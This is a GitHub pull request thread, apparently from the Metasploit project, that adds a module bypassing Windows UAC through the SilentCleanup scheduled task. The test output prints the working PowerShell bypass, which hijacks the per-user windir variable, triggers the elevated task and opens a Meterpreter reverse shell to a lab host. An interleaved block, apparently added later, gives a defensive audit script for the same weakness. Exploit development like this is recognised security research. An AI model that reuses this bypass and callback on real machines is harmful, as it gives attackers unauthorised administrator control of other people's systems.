
Add SilentCleanup UAC Bypass module #11997

Merged
merged 10 commits into from Jun 27, 2019

@cbrnrd
Contributor

commented Jun 20, 2019

This PR adds a module that bypasses UAC via the "SilentCleanup" task in Windows Task Scheduler

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Get a session
  • use exploit/windows/smb/local/bypassuac_silentcleanup
  • set session 1
  • run
  • Get an elevated session

TODO

  • Getting it to work
    I have tried for days but I cannot figure out the proper configuration for cmd_psh_payload to work when in a PS1 context. Any help would be greatly appreciated.
    Thanks @NickTyrer!
  • Docs (ping @h00die)

References

https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/
https://www.youtube.com/watch?v=C9GfMfFjhYI&t=432s

@NickTyrer

Contributor

commented Jun 20, 2019

@cbrnrd I added:
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [['Microsoft Windows', {}]],
to allow me to use 64bit payloads and the module worked fine.

@cbrnrd

Contributor Author

commented Jun 20, 2019

@NickTyrer
You are my god

cbrnrd added some commits Jun 20, 2019

@cbrnrd cbrnrd changed the title WIP: Create SilentCleanup UAC Bypass module Add SilentCleanup UAC Bypass module Jun 20, 2019

cbrnrd added some commits Jun 20, 2019

@wvu-r7
Contributor

left a comment

Thanks for the contribution, @cbrnrd! I have completed my first pass of review, but there are some questions that need to be answered. Thanks!

@wvu-r7 wvu-r7 self-assigned this Jun 22, 2019

@wvu-r7

wvu-r7 approved these changes Jun 26, 2019

Contributor

left a comment

Testing. :)

Fix missing is_in_admin_group? method
This was missed in the refactor, since admin_group was removed.
@wvu-r7

Contributor

commented Jun 27, 2019

Fixed NameError from refactor. Clean run after:

msf5 exploit(windows/local/bypassuac_silentcleanup) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Part of Administrators group! Continuing...
[*] Powershell command length: 6591
[*] Uploading payload PS1...
[*]
      if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
        powershell.exe -nop -w hidden -noni -e <base64-encoded payload elided>
      } else {
          $registryPath = "HKCU:\Environment"
          $Name = "windir"
          $Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"
          Set-ItemProperty -Path $registryPath -Name $name -Value $Value
          #Depending on the performance of the machine, some sleep time may be required before or after schtasks
          Start-Sleep -Milliseconds 0
          schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null
          Remove-ItemProperty -Path $registryPath -Name $name
      }

[+] Payload uploaded to C:\Windows\TEMP\PbHjYLmP.ps1
[*] Sending stage (206403 bytes) to 192.168.56.105
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.105:49159) at 2019-06-27 11:16:14 -0500
[+] Deleted C:\Windows\TEMP\PbHjYLmP.ps1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted
msf5 exploit(windows/local/bypassuac_silentcleanup) >
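The run above shows the two conditions the bypass depends on: the SilentCleanup task is launched elevated, and its action expands an unquoted `%windir%` at run time, so a per-user `windir` value under `HKCU:\Environment` is honoured. The following audit script is an added example, not code from this PR or from Metasploit; it inspects the task and looks for the override value and the task's last run, which is what a defender or a tester verifying a target would want to check. It assumes a Windows 10 host with the standard Disk Cleanup task registered at the path used by the module, and that the built-in `ScheduledTasks` module cmdlets are available.

```powershell
# Added example (not part of the PR or the Metasploit module): audit a host
# for the preconditions of the SilentCleanup UAC bypass and for its artefacts.
# Assumptions: Windows 10, task registered at \Microsoft\Windows\DiskCleanup\,
# ScheduledTasks module present. Runs as a normal user; no elevation needed.

$taskPath = '\Microsoft\Windows\DiskCleanup\'
$taskName = 'SilentCleanup'

# 1. Inspect the task definition: run level and the first action's command.
$task   = Get-ScheduledTask -TaskPath $taskPath -TaskName $taskName -ErrorAction Stop
$action = $task.Actions | Select-Object -First 1
$cmd    = $action.Execute

Write-Host ("Task run level : {0}" -f $task.Principal.RunLevel)
Write-Host ("Task action    : {0} {1}" -f $cmd, $action.Arguments)

# The action path is resolved when the task starts, so an environment variable
# at the front of an unquoted path is the thing to flag.
$startsWithEnvVar = $cmd -match '^%[^%]+%'
$unquoted         = -not $cmd.StartsWith('"')
$elevated         = $task.Principal.RunLevel -eq 'Highest'

if ($startsWithEnvVar -and $unquoted -and $elevated) {
    Write-Warning ("{0} runs elevated and expands an unquoted '{1}' at launch; " +
                   "a per-user override of that variable will be honoured.") -f $taskName, $cmd
}

# 2. Look for the abuse artefact: a user-level 'windir' value. The module
#    sets this immediately before triggering the task and removes it after,
#    so a lingering value usually means a failed or interrupted run.
$userWindir = Get-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -ErrorAction SilentlyContinue
if ($null -ne $userWindir) {
    Write-Warning ("HKCU:\Environment\windir is set to: {0}" -f $userWindir.windir)
} else {
    Write-Host 'No user-level windir override present.'
}

# 3. Record when the task last ran; an on-demand run outside the normal
#    maintenance window is worth correlating with other telemetry.
$info = Get-ScheduledTaskInfo -TaskPath $taskPath -TaskName $taskName
Write-Host ("Last run time  : {0}  result: 0x{1:X}" -f $info.LastRunTime, $info.LastTaskResult)
```

The script deliberately does not set the registry value or start the task; it reports whether the preconditions hold and whether the `windir` override is present, which is the state an incident responder would want to capture before cleanup.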
@wvu-r7

Contributor

commented Jun 27, 2019

I added @enigma0x3 as an independent discoverer. The added https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ reference should be helpful, though unrelated to this particular vector. I also fixed a typo where byshone69 should be nyshone69. :-)

@wvu-r7

Contributor

commented Jun 27, 2019

Also, I love unquoted paths. Such classic behavior. :')

@wvu-r7 wvu-r7 merged commit 6f1aaac into rapid7:master Jun 27, 2019

1 of 3 checks passed

  • Metasploit Automation - Sanity Test Execution: Running automation sanity tests. Details available on completion.
  • continuous-integration/travis-ci/pr: The Travis CI build is in progress.
  • Metasploit Automation - Test Execution: Successfully completed all tests.

wvu-r7 added a commit that referenced this pull request Jun 27, 2019

@wvu-r7

Contributor

commented Jun 27, 2019

Landed after final changes. We can iterate on this going forward. Thanks, everyone!

msjenkins-r7 added a commit that referenced this pull request Jun 27, 2019

@wvu-r7

Contributor

commented Jun 27, 2019

Release Notes

This adds a UAC bypass using an unquoted path in the SilentCleanup scheduled task for Windows.

@cbrnrd

Contributor Author

commented Jun 27, 2019

Thanks for the final touch-ups @wvu-r7 👏
